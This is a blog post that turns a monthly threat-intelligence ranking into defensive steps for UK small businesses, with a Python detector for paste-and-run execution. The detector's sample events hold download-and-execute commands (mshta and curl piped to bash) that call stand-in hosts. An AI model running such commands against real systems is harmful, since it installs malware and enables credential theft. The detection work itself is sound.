Red Canary's March 2026 Threat Report: What UK Small Businesses Need to Do This Week
Red Canary published their Intelligence Insights report for March 2026 on 19 March. The report covers threat activity observed across their customer base during February 2026. It is one of the more useful monthly intelligence publications available because it ranks threats by prevalence across real customer environments, not by theoretical severity.
This post takes the key findings and translates them into specific, practical steps for UK small businesses. I will start with what the data actually says, then tell you what to do about it.
The February 2026 Top Ten: What the Rankings Tell Us
The full ranked list for February 2026, with positions, is as follows:
- 1. ScreenConnect (no change)
- 2. Atomic Stealer (up, highest-ever rank; tied)
- 2. ClearFake (up; tied)
- 2. MacSync Stealer (up, highest-ever rank; tied)
- 2. Scarlet Goldfinch (up; tied)
- 6. Vidar (up; first appearance since September 2022)
- 7. Amber Albatross (down)
- 8. NetSupport Manager (down)
- 9. SocGholish (up; tied)
- 9. JustAskJacky (up; tied)
There is a four-way tie for second place and a two-way tie for ninth. Red Canary ranks by the number of unique customer environments in which a threat was observed, not by severity or damage caused.
The single observation that ties most of this together: all four threats tied for second place are currently delivered via paste-and-run. Red Canary state this explicitly. It is the dominant initial access technique in this month’s data, and it deserves your full attention before you read anything else.
What Paste-and-Run Means and Why It Bypasses Your Defences
Paste-and-run, also known as ClickFix or FakeCAPTCHA, is a social engineering technique where an attacker presents the victim with a fake error message or CAPTCHA on a website. The message instructs them to press a keyboard shortcut, paste a command that has been silently copied to their clipboard, and press Enter.
The command runs. It is malicious. The victim did it themselves.
This technique evades most standard defences because there is no malicious attachment to scan, no suspicious download to block, and no executable being sent by email. The malicious action happens entirely on the victim’s own machine, initiated by the victim’s own keystrokes. Standard email filtering, antivirus, and many endpoint tools do not have visibility into this execution path unless specifically configured for it.
For a small business with limited security tooling, paste-and-run is a significant gap. The only reliable defence is a combination of staff awareness and endpoint controls that restrict which commands can be executed.
ScreenConnect: Still Number One, Still Being Abused via Phishing
ScreenConnect has held the top position for at least two consecutive months. Red Canary document it being delivered via phishing emails disguised as party invitations and official documents. In some observed cases, a different remote access tool was delivered first (Datto, CentraStage, or Syncro), which then installed ScreenConnect as a second stage. One RMM tool installing another is a deliberate obfuscation technique.
If your business uses ScreenConnect or any other remote access software, the audit question is specific: does every installed instance connect to your account or your IT provider’s account? Not someone else’s. This is not a theoretical check. The STAC6405 campaign documented by Sophos last week showed exactly this technique being used at scale against over 80 organisations.
macOS Is Not a Safe Harbour: Two Mac Infostealers in the Top Five
Both Atomic Stealer and MacSync Stealer reached their highest-ever rankings in February 2026, sitting jointly in second place. Both target macOS systems specifically, and both are delivered via paste-and-run.
Atomic Stealer is designed to steal browser-stored credentials, payment card data, macOS Keychain entries, and cryptocurrency wallet data. In February 2026, Red Canary observed it using a new numeric obfuscation scheme in its AppleScript code, likely in response to Apple publishing new XProtect detection rules the previous month. MacSync Stealer targets the same data types and was observed using a Homebrew-style pop-up as a lure, tricking users into running a curl command that downloaded and executed the stealer.
Many UK small businesses adopt Macs under the assumption that they face fewer security threats than Windows devices. The February 2026 data does not support that assumption. Two macOS-specific infostealers in the top five is not a marginal finding.
If your business has Mac devices, they require the same security controls as Windows devices: endpoint protection, application controls, and staff awareness training that covers Mac-specific lure techniques.
Vidar Returns After 3.5 Years: What the Comeback Means
Vidar is an information stealer that has been active since 2018, originally developed as a fork of the Arkei malware family. It last appeared in Red Canary’s top ten in September 2022. Its return at number six in February 2026 is directly connected to the 2025 law enforcement disruptions of LummaC2 and Rhadamanthys, two widely used information stealers. Red Canary note that the migration toward alternatives was “inevitable.”
Trend Micro reported an updated Vidar version in October 2025 with improved anti-analysis capabilities, enhanced data theft functions, and more capable browser credential extraction. The February 2026 execution chain Red Canary documented shows Vidar being delivered via a fake CAPTCHA paste-and-run lure, using mshta.exe to retrieve and execute the payload, then injecting malicious code into chrome.exe and msedge.exe to steal credentials and session tokens, before deleting itself from disk.
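As an added illustration that is not from the Red Canary report or this post, the following Python checks constructed process-creation events against the patterns described above: a script host launched interactively (Run dialog or Terminal) with a URL on its command line, mshta.exe retrieving remote content as in the Vidar chain, and the curl-piped-to-shell form of the MacSync lure. Field names, hostnames and URLs are assumed and constructed; map them to whatever your EDR or Sysmon export actually provides.

```python
import re

# Script hosts and downloaders that paste-and-run lures typically invoke.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "curl.exe", "curl", "sh", "bash", "zsh"}
# Parents meaning a human typed or pasted the command (Run dialog or a terminal).
INTERACTIVE_PARENTS = {"explorer.exe", "Terminal", "iTerm2"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
PIPE_TO_SHELL_RE = re.compile(r"\bcurl\b[^|]*\|\s*(ba|z)?sh\b")

PASTE_AND_RUN = "paste-and-run: script host launched interactively with a URL"
MSHTA_REMOTE = "mshta.exe retrieving remote content (Vidar-style first stage)"
PIPE_TO_SHELL = "curl output piped straight into a shell (MacSync-style lure)"

def basename(path):
    # Last path component, accepting Windows or POSIX separators.
    return path.replace("\\", "/").rsplit("/", 1)[-1]

def classify(event):
    """Return the list of findings for one process-creation event (a dict)."""
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent_image", ""))
    cmdline = event.get("command_line", "")
    has_url = bool(URL_RE.search(cmdline))
    findings = []
    if image in SCRIPT_HOSTS and parent in INTERACTIVE_PARENTS and has_url:
        findings.append(PASTE_AND_RUN)
    if image == "mshta.exe" and has_url:
        findings.append(MSHTA_REMOTE)
    if PIPE_TO_SHELL_RE.search(cmdline):
        findings.append(PIPE_TO_SHELL)
    return findings

def scan(events):
    # (host, finding) pairs for every event that trips a rule.
    return [(ev["host"], f) for ev in events for f in classify(ev)]

# Constructed sample events; field names assume a Sysmon/EDR-style export.
SAMPLE_EVENTS = [
    {"host": "WS-07", "parent_image": r"C:\Windows\explorer.exe",  # Win+R lure
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://captcha-check.invalid/verify"},
    {"host": "WS-03", "parent_image": r"C:\Windows\System32\svchost.exe",  # scheduled task
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -File C:\Scripts\backup.ps1"},
    {"host": "MBP-12",  # fake Homebrew prompt pasted into Terminal
     "parent_image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "image": "/bin/zsh",
     "command_line": 'zsh -c "curl -fsSL https://brew-update.invalid/install.sh | bash"'},
]
```

The same rules work as a saved search in most EDR consoles; the interactive-parent condition is what separates a pasted command from the scheduled scripts that would otherwise flood the alert queue.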
The practical lesson from Vidar’s return is that law enforcement action against criminal infrastructure reduces but does not eliminate threats. The criminal ecosystem is resilient and adaptive. When one stealer is disrupted, others fill the gap. Your defences need to address the technique (credential theft via stealer malware) rather than specific named variants.
JustAskJacky: Malicious Apps Disguised as AI Tools
JustAskJacky is a family of malicious Node.js applications that present themselves as helpful AI assistants or utility tools while conducting reconnaissance and executing arbitrary commands in the background. Lure names include AllManualsReader, AskBettyHow, ManualReaderPro, and OpenMyManual.
This threat is relevant to small businesses whose staff are actively looking for free AI productivity tools. An employee searching for a quick AI assistant to help with a task, finding what looks like a useful free application, and downloading it is a plausible scenario in most businesses. The malicious intent is not visible during installation.
How to Turn This Into a Competitive Advantage
Monthly threat intelligence is available to anyone, but most small businesses do not act on it. The ones that do, and can demonstrate they do, have a concrete differentiator in procurement conversations and supplier assessments.
Document your threat awareness process. A simple monthly log showing that your business reviews authoritative threat intelligence and takes specific actions in response is evidence of a proactive security posture. It costs one hour per month. It satisfies requirements in several cyber insurance policies and supply chain questionnaires.
Use the Mac security gap as a client conversation. If you operate in a sector where clients also use Macs, being able to say that you apply consistent security controls across all device types, including macOS, is a differentiator. Most of your competitors have not thought about this.
Reference the paste-and-run threat in your staff training records. If you brief your team on this technique this month, document it. Dated training records showing your team was specifically briefed on current attack methods are useful evidence in both insurance and procurement contexts.
How to Sell This to Your Board
Three points that translate into board-level language.
The threat to credentials is the threat to the business. Every high-ranking threat in this month’s data is primarily a credential theft operation, taking browser-stored passwords, session tokens, and email account access. When an attacker has those, they have access to your business systems, your client data, and your financial platforms. The credential is the key; losing it is the breach.
Your Macs are in scope. If the board believes Mac devices require less security investment, the February 2026 threat data is a direct challenge to that position. Two of the top five threats specifically target macOS. Applying lower security standards to Macs is a gap that is being actively exploited.
Takedowns do not make you safe. The return of Vidar illustrates that criminal infrastructure disruptions reduce the threat temporarily, not permanently. Adversaries adapt. Security is not a one-time problem that gets solved; it is an ongoing operational requirement, and that is the investment case for continuous controls. This month’s data is the evidence.
What This Means for Your Business
- Brief your team on paste-and-run this week. Show them what the lure looks like: a webpage saying they need to press Windows+R (or Command+Space on Mac), paste something to fix an error or complete a CAPTCHA, and press Enter. Tell them the rule is simple: if a website asks them to copy and run a command, they stop and call IT before doing anything.
- Audit remote access software on every device. Log into each installed instance of ScreenConnect, AnyDesk, TeamViewer, LogMeIn, or any other remote access tool and confirm it connects to your account or your authorised IT provider’s account. Flag anything unrecognised as an immediate incident.
- Apply endpoint protection to Mac devices. If your Mac devices currently run without endpoint security software, address this before anything else. Several Cyber Essentials-aligned providers support macOS. This is not optional given the current threat data.
- Block software installs from unapproved sources. On both Windows and Mac, configure devices so that standard users cannot install software without administrator approval. This is a Cyber Essentials requirement and it stops both paste-and-run payloads and threats like JustAskJacky from completing their installation.
- Check browser credential storage. The majority of infostealers in this month’s data specifically target credentials saved in browsers: Chrome, Edge, Safari. Review whether your business relies on browser-saved passwords and consider replacing that with a dedicated password manager, which stores credentials in an encrypted vault rather than the browser’s credential store.